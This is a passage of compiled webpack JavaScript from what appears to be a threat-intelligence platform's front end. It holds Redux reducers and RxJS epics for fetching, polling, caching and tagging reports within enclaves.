    if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isImmutable"])(tag)) {
      return tag.set('enclaveId', reportEnclaveId);
    }
    // Meaning it's a string
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ name: tag, enclaveId: reportEnclaveId });
  }).toOrderedMap().mapKeys(function (k, v) {
    return v.get('name');
  });
  return data.withMutations(function (x) {
    x.set('attributes', attributes);
    x.set('tags', enclaveTags);
  });
};

// $FlowFixMe
var reports = function reports() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      meta = action.meta;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["D" /* REMOVE_SUCCESS */]:
      return state.delete(payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["M" /* SET_ENCLAVE_TAG_SUCCESS */]:
      return state.setIn([payload.id, 'data', 'tags', payload.tag.get('name')], payload.tag);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["G" /* SET_ATTRIBUTE_SUCCESS */]:
      return state.setIn([payload.id, 'data', 'attributes', payload.tag.get('name')], payload.tag);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["B" /* REMOVE_ENCLAVE_TAG_SUCCESS */]:
      return state.deleteIn([payload.id, 'data', 'tags', payload.tag.get('name')]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["y" /* REMOVE_ATTRIBUTE_SUCCESS */]:
      return state.deleteIn([payload.id, 'data', 'attributes', payload.tag.get('guid')]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["n" /* MODIFY_DISTRIBUTION_SUCCESS */]:
      return state.setIn([payload.id, 'data', 'distributionType'], payload.distributionType);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["Q" /* STORE_SUCCESS */]:
      var _id = payload.get('id');
      return state.mergeIn([_id], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
        id: _id,
        loading: false,
        lastFetched: Date.now(),
        data: mapMetadata(payload)
      }));
    case __WEBPACK_IMPORTED_MODULE_10__action_types__["P" /* STORE_FROM_LOCAL */]:
      var _reportGuid = payload.get('guid');
      return state.mergeIn([_reportGuid], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
        id: _reportGuid,
        loading: false,
        lastFetched: Date.now(),
        data: mapMetadata(payload)
      }));
    case __WEBPACK_IMPORTED_MODULE_9_modules_company_whitelist_action_types__["SAVE_WHITELIST_ENTRY_SUCCESS"]:
      return state.map(function (report) {
        return report.setIn(['data', 'indicators'], report.getIn(['data', 'indicators']).filter(function (d) {
          return d.get('value') !== payload.get('value');
        }));
      });
    case __WEBPACK_IMPORTED_MODULE_6_modules_indicators_action_types__["z" /* REVERT_CLASSIFICATION_SUCCESS */]:
      var indexOfIndicator = state.getIn([payload.reportId, 'data', 'indicators'], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).findIndex(function (ioc) {
        return ioc.get('value') === payload.value;
      });
      if (indexOfIndicator > -1) {
        return state.setIn([payload.reportId, 'data', 'indicators', indexOfIndicator, 'weight'], 1).setIn([payload.reportId, 'data', 'indicators', indexOfIndicator, 'reason'], '');
      }
      return state;
    case __WEBPACK_IMPORTED_MODULE_4_modules_create_action_types__["UPDATE_REPORT_SUCCESS"]:
      return state.delete(payload);
    default:
      return state;
  }
};

var metadata = function metadata(state, action) {
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* FETCH_METADATA */]:
      // Payload will be string[]. An array of ids.
      return payload.reduce(function (state, id) {
        return state.setIn([id, 'loading'], true);
      }, state);
    default:
      return state;
  }
};

var reportList = function reportList() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4_modules_create_action_types__["REPORT_PROCESSED"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* CLEAR_LIST */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["r" /* REFETCH_REPORTS */]:
      // Clear existing list whenever re-fetching
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_LIST_SUCCESS */]:
      var fetchReports = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload).toOrderedMap().mapKeys(function (k, v) {
        return v.get('id');
      }).map(function (x) {
        return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
          id: x.get('id'),
          data: x,
          loading: false // Start loading
        });
      });
      return state.concat(fetchReports);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* FETCH_METADATA */]:
      return metadata(state, action);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* FETCH_METADATA_FAILURE */]:
      return state.setIn([payload, 'loading'], false);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["D" /* REMOVE_SUCCESS */]:
      return state.delete(payload);
    default:
      return state;
  }
};

var isFetchingList = function isFetchingList() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_LIST */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_LIST_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_LIST_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var reportActionAsyncInProgress = function reportActionAsyncInProgress() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* COPY_REPORT */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["o" /* MOVE_REPORT */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* COPY_REPORT_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* COPY_REPORT_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* MOVE_REPORT_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* MOVE_REPORT_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* **************************************************************************
 * Current Report
 * *************************************************************************/

// $FlowFixMe
var currentReportId = function currentReportId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var payload = action.payload,
      type = action.type;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["d" /* CLEAR */]:
      return null;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["H" /* SET_CURRENT_ID */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["r" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["q" /* FETCH_FAILURE */]:
      return payload.id;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["D" /* REMOVE_SUCCESS */]:
      return null;
    default:
      return state;
  }
};

/* **************************************************************************
 * Reports Display Options
 * *************************************************************************/

var DefaultOptions = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  page: 0,
  hasNext: false,
  search: '',
  tags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  excludedTags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  enclaveFilters: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(),
  includeCommunity: true
});

var fromOptions = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"], function (x) {
  return x.update('enclaveFilters', function (x) {
    return x ? Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(x) : x;
  });
});

// $FlowFixMe
var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : DefaultOptions();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["I" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(fromOptions(payload));
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_LIST_SUCCESS */]:
      return state.set('hasNext', payload.size < __WEBPACK_IMPORTED_MODULE_7__constants_js__["c" /* PAGE_SIZE */] ? false : true);
    default:
      return state;
  }
};

var increment = function increment(x) {
  return x + 1;
};
var decrement = function decrement(x) {
  return x - 1;
};

/**
 * Fetching metadata is meant to be fire and forget. This means we want to avoid
 * numerous unecessary calls to fetch metadata. Thus the cache was born!
 */
var metadataCache = function metadataCache() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4_modules_create_action_types__["UPDATE_REPORT_SUCCESS"]:
      return state.delete(payload.id);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["M" /* SET_ENCLAVE_TAG_SUCCESS */]:
      if (payload.id && state.has(payload.id)) {
        var newTag = payload.tag;
        return state.update(payload.id, function (report) {
          return report.setIn(['tags', newTag.get('name')], newTag);
        });
      }

      return state;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["Q" /* STORE_SUCCESS */]:
      var _id2 = payload.get('id');
      return state.has(_id2) ? state.update(_id2, function (s) {
        return s.set('read', true);
      }) : state;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* FETCH_METADATA_SUCCESS */]:
      {
        var updated = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload).toMap().mapKeys(function (k, v) {
          return v.get('reportGuid');
        }).map(mapMetadata).map(function (x) {
          return x.set('updatedAt', Date.now());
        });
        return state.merge(updated);
      }
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* CLEAR_REPORT_METADATA_CACHE */]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
    case __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["k" /* DELETE_NOTE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["H" /* SAVE_NOTE_SUCCESS */]:
      {
        var _id3 = payload.nodeGuid;
        var updater = type === __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__["k" /* DELETE_NOTE_SUCCESS */] ? decrement : increment;

        // Manually update note count when user adds a new note in app
        // Only update state if necessary to avoid adding a key with an undefined
        // value
        if (state.get(_id3)) {
          return state.update(_id3, function (x) {
            return x.update('noteCount', updater);
          });
        } else {
          return state;
        }
      }
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_8_redux_immutable__["combineReducers"])({
  reports: reports,
  reportList: reportList,
  isFetchingList: isFetchingList,
  currentReportId: currentReportId,
  options: options,
  metadataCache: metadataCache,
  reportActionAsyncInProgress: reportActionAsyncInProgress
}));

/***/ }),
/* 2961 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs_operators__ = __webpack_require__(449);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_rxjs_operators___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_rxjs_operators__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_moment__ = __webpack_require__(141);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_moment___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_moment__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_reports_extraction__ = __webpack_require__(1331);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_router_action_types__ = __webpack_require__(1349);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_tags_action_types__ = __webpack_require__(364);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__actions__ = __webpack_require__(409);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_constellation__ = __webpack_require__(403);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_modules_search__ = __webpack_require__(253);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_modules_indicators__ = __webpack_require__(560);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_modules_search_action_types__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_modules_create_action_types__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21_modules_enclave_getters_js__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22_modules_enclave_types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23_modules_enclave_action_types_js__ = __webpack_require__(356);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24__constants_js__ = __webpack_require__(575);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_25__getters_js__ = __webpack_require__(215);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_26_modules_constellation_epics_js__ = __webpack_require__(1385);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_27_modules_profile_getters_js__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_29__utils__ = __webpack_require__(509);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_30_modules_tags_utils__ = __webpack_require__(763);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_31_modules_create_utils__ = __webpack_require__(711);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_32_modules_alerts_action_types__ = __webpack_require__(493);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_33_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_33_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_33_react__);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

/*  weak */











var debug = __WEBPACK_IMPORTED_MODULE_9_debug___default()('app:modules:reports:epics'); // eslint-disable-line no-unused-vars



























/* Log possible errors and keep Rx stream alive */
var handleError = function handleError(error, stream) {
  var message = 'Error in Reports Epics:';
  // TODO_LOG Raven.captureException(new Error(message), {extra: { error }});
  console.warn(message);
  console.error(error);
  return stream;
};

/* Filter out the enclaves on a report that the user does not belong to. */
var mapEnclaves = function mapEnclaves(reportEnclaves, state) {
  if (!reportEnclaves || !(typeof reportEnclaves.map === 'function')) {
    return Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["List"])();
  }

  var canViewAllEnclaves = __WEBPACK_IMPORTED_MODULE_27_modules_profile_getters_js__["hasPermission"]('get_data')(state);
  var enclaves = __WEBPACK_IMPORTED_MODULE_27_modules_profile_getters_js__["enclaves"](state);
  return canViewAllEnclaves ? Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])(reportEnclaves).map(__WEBPACK_IMPORTED_MODULE_22_modules_enclave_types_js__["i" /* createEnclave */]) : Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])(enclaves).toList().map(__WEBPACK_IMPORTED_MODULE_22_modules_enclave_types_js__["i" /* createEnclave */]).filter(function (x) {
    // $FlowIssue: This will NOT be void. See check at the top
    return reportEnclaves.map(function (y) {
      return y.get('id');
    }).includes(x.get('id'));
  });
};

/**
 * Map the report object to something a bit more friendly from a UI perspective.
 *
 * TODO: It may be best to keep this sort of logic in the stores, the only issue
 * would be when we want to go back toJSON, it would probably have to be done in
 * the actions.
 */
var reportFromJson = function reportFromJson(reportPointer, state) {
  return Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])(reportPointer).mapEntries(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 2),
        k = _ref2[0],
        v = _ref2[1];

    switch (k) {
      case 'created':
      case 'updated':
        return [k, __WEBPACK_IMPORTED_MODULE_7_moment___default()(v)];
      case 'enclaves':
        return ['enclaves', mapEnclaves(v, state)];
      default:
        return [k, v];
    }
  });
};

/**
 * Initialize the reports, using the user's enclaves
 *
 * NOTE: We were seeing postgres performance issues in prod and eliminating
 * community enclaves from the query is an effort to help address the proximate
 * problem.
 */
var initializeEpic = function initializeEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20_modules_profile_action_types_js__["f" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (profile) {
    var enclaveFilters = __WEBPACK_IMPORTED_MODULE_27_modules_profile_getters_js__["groupedFilterEnclaves"](store.getState()).get('INTERNAL', Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["List"])()) // NOTE: Only show private enclaves for now
    .map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('id')).toSet();

    var reportOptions = {
      enclaveFilters: enclaveFilters,
      includeCommunity: !enclaveFilters.size, // See NOTE
      search: ''
    };

    var SearchBeenInitializedAlready = __WEBPACK_IMPORTED_MODULE_16_modules_search__["getters"].searchPayloadHasBeenInitialized(store.getState());

    // Interdependency a-gogo :/
    var actionsToDispatch = [__WEBPACK_IMPORTED_MODULE_13__actions__["setDisplayOptions"](reportOptions), __WEBPACK_IMPORTED_MODULE_17_modules_indicators__["actions"].setFetchOptions({ enclaveFilters: enclaveFilters }), __WEBPACK_IMPORTED_MODULE_17_modules_indicators__["actions"].fetchIndicatorList()];

    if (!SearchBeenInitializedAlready) {
      actionsToDispatch = actionsToDispatch.concat([__WEBPACK_IMPORTED_MODULE_16_modules_search__["actions"].setSearchOptions({ enclaveFilters: enclaveFilters }), __WEBPACK_IMPORTED_MODULE_16_modules_search__["actions"].updateReportFilters(Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])({ enclaveFilters: enclaveFilters }), ['enclaveFilters']), __WEBPACK_IMPORTED_MODULE_16_modules_search__["actions"].updateEntityFilters(Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])({ enclaveFilters: enclaveFilters }), ['enclaveFilters'])]);
    }

    return actionsToDispatch;
  });
};

/*
 * Runs after a report is submitted or updatd. The report is persisted asynchronously
 * by the Ingest Service, so we pause the UI on the loading screen and poll the
 * server for the report status until it is updated as PROCESSED. Then we proceed
 * and fetch the report and constellation and redirect the user back into the app.
 *
 * NOTE: We takeUntil a specific navigation action, not REPLACE but PUSH, which
 * means the user initiated a navigation away from the current view. This is because
 * our replace actions also produce LOCATION_CHANGE actions which would otherwise
 * cancel the stream output.
 */
var pollReportAndStore = function pollReportAndStore(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["SUBMIT_REPORT_SUCCESS"], __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["UPDATE_REPORT_SUCCESS"]).delay(500), action$.ofType(__WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["POLL_FOR_REPORT"])).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref4) {
    var id = _ref4.id,
        submissionVersion = _ref4.submissionVersion,
        _ref4$attempts = _ref4.attempts,
        attempts = _ref4$attempts === undefined ? 0 : _ref4$attempts;

    return ajax.get(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/status/' + id + '?submissionVersion=' + submissionVersion).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).mergeMap(function (status) {
      // If status is false recycle and poll again, otherwise complete stream:
      return status ? __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["REPORT_PROCESSED"] }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["success"])('Report processing complete'), Object(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__["replace"])('/constellation/reports/' + id)]).delay(500) : __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["POLL_FOR_REPORT"], payload: { id: id, submissionVersion: submissionVersion, attempts: attempts + 1 } });
    }).catch(function (err) {
      if (attempts >= __WEBPACK_IMPORTED_MODULE_24__constants_js__["a" /* MAX_RETRY_NEW_REPORT_POLLING */]) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["REPORT_POLLING_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["error"])('Something went wrong, try refreshing your browser.'), Object(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__["replace"])('/browse/reports')]);
      }

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["POLL_FOR_REPORT"],
        payload: { id: id, submissionVersion: submissionVersion, attempts: attempts + 1 }
      }).delay(1000);
    }).takeUntil( // See NOTE
    action$.ofType(__WEBPACK_IMPORTED_MODULE_10_modules_router_action_types__["a" /* LOCATION_CHANGE */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('action')).filter(function (action) {
      return action === 'PUSH';
    })).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["REPORT_POLLING_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["error"])('Something went wrong, try refreshing your browser.'), Object(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__["replace"])('/browse/reports')]);
    });
  });
};

var fetchAndStoreEpic = function fetchAndStoreEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["N" /* STORE */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).do(function (id) {
    return !id && console.warn('No id passed when trying to fetch report');
  }).filter(Boolean).mergeMap(function (id) {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + id).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).filter(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["isObject"]) // TODO: Is this check necessary? What might the server return?
    .map(function (x) {
      return reportFromJson(x, store.getState());
    }) // TODO: This is store-level logic. The fact that it's still here is legacy
    .map(function (x) {
      // Convert user GUID to enclaves list to preserve all existing functionality
      var enclavesStore = Object(__WEBPACK_IMPORTED_MODULE_21_modules_enclave_getters_js__["enclavesMap"])(store.getState());
      var populatedEnclave = enclavesStore.get(x.get('enclaveGuid'));
      return x.get('enclaves') ? x : x.set('enclaves', Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["List"])([populatedEnclave]));
    }) // TODO: This is store-level logic. The fact that it's still here is legacy
    .map(function (r) {
      return r.set('json', Object(__WEBPACK_IMPORTED_MODULE_8_trustar_reports_extraction__["e" /* parseJsonIfPossible */])(r.get('reportBody')));
    }).mergeMap(function (report) {
      return [{
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["Q" /* STORE_SUCCESS */],
        payload: report
      }, {
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["k" /* FETCH_METADATA */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["List"])([report.get('id')])
      }];
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["O" /* STORE_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var enclaveTagErrorMessageObservable = function enclaveTagErrorMessageObservable(message) {
  var err = new Error(message);
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
    type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["L" /* SET_ENCLAVE_TAG_FAILURE */],
    error: true,
    payload: err,
    meta: {
      alert: { type: 'error', text: err.message }
    }
  });
};
// Enclave Tag Helpers
// TODO:FLOW
var formatTagObject = function formatTagObject(reportId, tag, enclaveId) {
  return {
    id: reportId,
    tag: tag.set('enclaveId', enclaveId)
  };
};

var enclaveTagEpic = function enclaveTagEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["J" /* SET_ENCLAVE_TAG */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref7) {
    var id = _ref7.id,
        name = _ref7.name,
        enclaveId = _ref7.enclaveId;


    var message = void 0;
    if (name.length > __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */]) message = 'Tag name must be less than ' + __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */] + ' characters.';
    if (!name.trim()) message = 'No tag name specified.';

    if (message) {
      var err = new Error(message);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["L" /* SET_ENCLAVE_TAG_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: err.message }
        }
      });
    }
  });
};

var setEnclaveTagsBulk = function setEnclaveTagsBulk(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["K" /* SET_ENCLAVE_TAGS_BULK */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref9) {
    var id = _ref9.id,
        addedTags = _ref9.addedTags,
        enclaveIds = _ref9.enclaveIds,
        removedTags = _ref9.removedTags,
        alertOnSuccess = _ref9.alertOnSuccess;

    var message = void 0;

    var enclaveTagCombinations = enclaveIds.flatMap(function (enclaveId) {
      return addedTags.map(function (name) {
        if (!name.trim()) message = 'No tag name specified.';
        if (name.length > __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */]) message = 'Tag name must be less than ' + __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */] + ' characters.';
        return { id: id, enclaveId: enclaveId, name: name };
      });
    });

    var enclaveTagCombinationsForDeletion = removedTags && enclaveIds.flatMap(function (enclaveId) {
      return removedTags.map(function (name) {
        if (!name.trim()) message = 'No tag name specified.';
